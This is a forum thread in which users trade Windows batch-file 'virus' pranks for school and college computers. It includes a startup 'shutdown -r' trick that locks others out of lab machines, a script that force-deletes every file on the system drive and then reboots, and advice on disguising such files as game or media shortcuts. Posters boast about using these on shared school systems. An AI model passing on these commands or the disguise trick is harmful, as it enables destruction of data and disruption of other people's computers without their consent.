LEARN SIMPLE VIRUS >>>PROgRAM USING ...NOTEPAD....

Status
Not open for further replies.
Ya Yogi's Idea is Great
We should create shortcut of Nice logo like Games or Medias..
Then Name Should be Buzz!!!, Dancing Baby!, CrazyMAN!...Like tht...
Thtz the PC Crap Maker of School, College..
he he he he he...
 


another one i use in colleges.

put the following code in startup

shutdown -r

it will restart whenever logged in.u can only use the system by pressing ctrl+c continuously when logging in.for others it will restart continuosly.i use this to get my fav system in lab always.
 
we can really do magic with batch programming frnds.i had amused lot of my friends with my batch files which wen executed do lot of frenzy activities.If u r strong with batch programming u can write even deadly viruses for lame users.i read batch programming guide of ankit.
 
he he .. that program has no effect on my computer cause in Cd rive I only have page file, which won't be deleted while Windows is running.

A better version of it is ::

Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Much better version

I had lots of fun at my school, the poor IT man didn't know what hit him:D
 
Hmm... u're "virus" is not detected on a regular antivirus because... it's not a virus... but it will be detected on more advanced software (script scanners) as malware or something... i've tried this sometime ago... they also detect flood scripts and indefinite cycling scripts... :D
 
Status
Not open for further replies.

Back
Top